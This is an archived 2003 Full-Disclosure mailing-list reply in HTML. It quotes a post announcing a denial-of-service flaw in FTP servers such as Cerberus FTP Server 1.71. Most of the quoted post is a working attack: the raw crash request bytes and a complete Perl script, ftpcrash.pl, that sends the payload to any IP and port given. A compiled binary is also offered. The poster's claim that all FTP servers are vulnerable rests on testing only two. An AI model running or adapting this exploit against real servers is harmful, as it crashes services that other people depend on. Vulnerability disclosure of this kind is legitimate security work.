[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
- To: "Florian Rock" <florianrock@web.de>, <vuln@secunia.com>, <full-disclosure@lists.netsys.com>
- Subject: RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
- From: "Aditya [Aditya Lalit Desgmukh]" <aditya@online.gr8domain.biz>
- Date: Wed, 20 Aug 2003 10:15:19 +0530
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2722.900" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>hi
there,</FONT></SPAN></DIV>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>no
binaries please! the source code in enough....</FONT></SPAN></DIV>
<BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px">
<DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma
size=2>-----Original Message-----<BR><B>From:</B>
full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com]<B>On Behalf Of </B>Florian
Rock<BR><B>Sent:</B> Monday, August 18, 2003 6:34 PM<BR><B>To:</B>
vuln@secunia.com; full-disclosure@lists.netsys.com<BR><B>Subject:</B>
[Full-Disclosure] FTPServer Denial Of Service
Vulnerability<BR><BR></FONT></DIV>
<DIV><FONT face=Arial size=2>I</FONT><FONT face=Arial size=2> have found
a very serious hole in FTPServer<BR>The Exploit is tested on Cerberus FTP
Server 1.71 and a own coded, but I think all FTPServer are
Vulnerable</FONT></DIV>
<DIV><FONT face=Arial size=2>Sorry but i have to less ftpserver to
test</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>And so it Works<BR>Typical
request:<BR>00000000 55 73 65 72 20 53 68 75 74 64 6f 77 6e 0d
0a User Shutdown..</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Exploit request:<BR>00000000 0d 0a 55 73 65
72 20 53 68 75 74 64 6f 77 6e ..User
Shutdown</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>I've coded an exploit:<BR>See attached file:
ftpcrash.exe (ziped) for people how have no perl</FONT></DIV>
<DIV><FONT face=Arial color=#0000ff size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>My exploit (in
perl):<BR>[code]<BR>-ftpcrash.pl-<BR>print "Exploit for
FTP-Server\n";<BR>print " by The real Remoter\n";<BR>my $usage =
"\nftpcrash <IP> <Port>\n";<BR>die "$usage" unless $ARGV[0]
&& $ARGV[1];<BR>use Socket;<BR>my $remote = $ARGV[0];<BR>my $port =
$ARGV[1];<BR>my $iaddr = inet_aton($remote);<BR>my $proto =
getprotobyname("tcp");<BR>my $paddr = sockaddr_in($port,
$iaddr);<BR>socket(SOCK, PF_INET, SOCK_STREAM, $proto);<BR>connect(SOCK,
$paddr) or die "Can't connect to " . $remote;<BR>print "Sending
exploit\n";<BR>$msg = "\x0d\x0a";<BR>$msg = $msg . "User
Shutdown";<BR>send(SOCK,$msg, 0) or die "Can't send
Exploit";<BR>sleep(1);<BR>print "Server
Crashed!";<BR>sleep(1);<BR>exit;<BR>[/code]</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Sorry for my bad english (I'm german)</FONT><FONT
face=Arial size=2><FONT size=1></DIV></BLOCKQUOTE></FONT></FONT></BODY></HTML>
smime.p7s